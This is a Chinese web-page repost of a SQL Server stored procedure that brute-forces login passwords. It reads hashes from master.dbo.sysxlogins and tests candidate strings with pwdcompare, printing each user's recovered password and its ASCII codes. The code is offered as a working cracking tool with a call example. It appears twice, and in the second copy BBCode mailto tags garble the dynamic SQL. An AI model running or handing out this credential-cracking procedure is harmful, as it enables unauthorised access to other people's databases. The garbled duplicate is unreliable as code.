| 订阅 | 在线投稿
分享
 
 
当前位置: 王朝网络 >> mssql >> 一个SQL Server Sa密码破解的存储过程 yi ge SQL Server Sa mi ma po jie de cun chu guo cheng
 

一个SQL Server Sa密码破解的存储过程

2008-07-30 06:50:43 编辑來源:互联网 繁體版 评论
 
 
本文为【一个SQL Server Sa密码破解的存储过程】的汉字拼音对照版显示拼音
  yigeSQL Server Samimapojiedecunchuguocheng:

  if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)

  drop procedure [dbo].[p_GetPassword]

  GO

  /*--qiongjufapojie SQL Server yonghumima

  keyipojiezhongwen,teshuzifu,zifu+yisuikonggedemima

  weilefang便bianxianshiteshuzifudemima,zaixianshijieguozhong,xianshilezuchengmimadeASCII

  lilunshangkeyipojierenyiweishudemima

  tiaojianshinidediannaopeizhizugou,shijianzugou

  /*--tiaoyongshili

  exec p_GetPassword

  --*/

  create proc p_GetPassword

  @username sysname=null, --yonghuming,ruguobuzhiding,zeliechusuoyouyonghu

  @pwdlen int=2 --yaopojiedemimadeweishu,morenshi2weijiyixiade

  as

  set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

  select top 255 id=identity(int,0,1) into #t from syscolumns

  alter table #t add constraint PK_#t primary key(id)

  select name,password

  ,type=case when xstatus&2048=2048 then 1 else 0 end

  ,jm=case when password is null then 1 else 0 end

  ,pwdstr=cast('' as sysname)

  ,pwd=cast('' as varchar(8000))

  into #pwd

  from master.dbo.sysxlogins a

  where srvid is null

  and name=isnull(@username,name)

  declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)

  declare @l int

  select @l=0

  ,@s1='char(aa.id)'

  ,@s2='cast(aa.id as varchar)'

  ,@s3=',#t aa'

  exec('

  update pwd set jm=1,pwdstr='+@s1+'

  ,pwd='+@s2+'

  from #pwd pwd'+@s3+'

  where pwd.jm=0

  and pwdcompare('+@s1+',pwd.password,pwd.type)=1

  ')

  while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)

  begin

  select @l=@l+1

  ,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)'

  ,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)'

  ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)

  exec('

  update pwd set jm=1,pwdstr='+@s1+'

  ,pwd='+@s2+'

  from #pwd pwd'+@s3+'

  where pwd.jm=0

  and pwdcompare('+@s1+',pwd.password,pwd.type)=1

  ')

  end

  select yonghuming=name,mima=pwdstr,mimaASCII=pwd

  from #pwd

  go原文
 
 
 
 
上一篇《SQL Server数据库sa密码相关问题的解决方法》
下一篇《详细讲解删除SQL Server日志的具体方法》
 
 
 
 
 
 
 
 
 
日版宠物情人插曲《Winding Road》歌词

日版宠物情人2017的插曲,很带节奏感,日语的,女生唱的。 最后听见是在第8集的时候女主手割伤了,然后男主用嘴帮她吸了一下,插曲就出来了。 歌手:Def...

兄弟共妻,我成了他们夜里的美食

老钟家的两个儿子很特别,就是跟其他的人不太一样,魔一般的执着。兄弟俩都到了要结婚的年龄了,不管自家老爹怎么磨破嘴皮子,兄弟俩说不娶就不娶,老父母为兄弟两操碎了心...

如何磨出破洞牛仔裤?牛仔裤怎么剪破洞?

把牛仔裤磨出有线的破洞 1、具体工具就是磨脚石,下面垫一个硬物,然后用磨脚石一直磨一直磨,到把那块磨薄了,用手撕开就好了。出来的洞啊很自然的。需要猫须的话调几...

我就是扫描下图得到了敬业福和爱国福

先来看下敬业福和爱国福 今年春节,支付宝再次推出了“五福红包”活动,表示要“把欠大家的敬业福都还给大家”。 今天该活动正式启动,和去年一样,需要收集“五福”...

冰箱异味产生的原因和臭味去除的方法

有时候我们打开冰箱就会闻到一股异味,冰箱里的这种异味是因为一些物质发出的气味的混合体,闻起来让人恶心。 产生这些异味的主要原因有以下几点。 1、很多人有这种习...

 
 
一个SQL Server Sa密码破解的存储过程: if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1) drop procedure [dbo].[p_GetPassword] GO /*--穷举法破解 SQL Server 用户密码 可以破解中文,特殊字符,字符+尾随空格的密码 为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII 理论上可以破解任意位数的密码 条件是你的电脑配置足够,时间足够 /*--调用示例 exec p_GetPassword --*/ create proc p_GetPassword @username sysname=null, --用户名,如果不指定,则列出所有用户 @pwdlen int=2 --要破解的密码的位数,默认是2位及以下的 as set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end select top 255 id=identity(int,0,1) into #t from syscolumns alter table #t add constraint PK_#t primary key(id) select name,password ,type=case when xstatus&2048=2048 then 1 else 0 end ,jm=case when password is null then 1 else 0 end ,pwdstr=cast('' as sysname) ,pwd=cast('' as varchar(8000)) into #pwd from master.dbo.sysxlogins a where srvid is null and name=isnull(@username,name) declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000) declare @l int select @l=0 ,@s1='char(aa.id)' ,@s2='cast(aa.id as varchar)' ,@s3=',#t aa' exec(' update pwd set jm=1,pwdstr='+@s1+' ,pwd='+@s2+' from #pwd [url=mailto:pwd]pwd'+@s3+'[/url] where pwd.jm=0 and pwdcompare([url=mailto:]'+@s1+',pwd.password,pwd.type)=1[/url] ') while exists(select 1 from #pwd where jm=0 and @l<@pwdlen) begin select @l=@l+1 ,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)' ,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)' ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97) exec(' update pwd set jm=1,pwdstr='+@s1+' ,pwd='+@s2+' from #pwd [url=mailto:pwd]pwd'+@s3+'[/url] where pwd.jm=0 and pwdcompare([url=mailto:]'+@s1+',pwd.password,pwd.type)=1[/url] ') end select 用户名=name,密码=pwdstr,密码ASCII=pwd from #pwd go
󰈣󰈤
  免责声明:本文仅代表作者个人观点,与王朝网络无关。王朝网络登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述,其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
清纯漂亮的美女
甜美的佳人
都市丽人写真
郊外美女 春色怡人
夕阳无限好--明天有早晨
雪,还是雪
hk夏日
日暮陆家嘴
 
>>返回首页<<
 为你推荐
 
 
 转载本文
 UBB代码 HTML代码
复制到剪贴板...
 
 热帖排行
 
 
 
 
©2005- 王朝网络 版权所有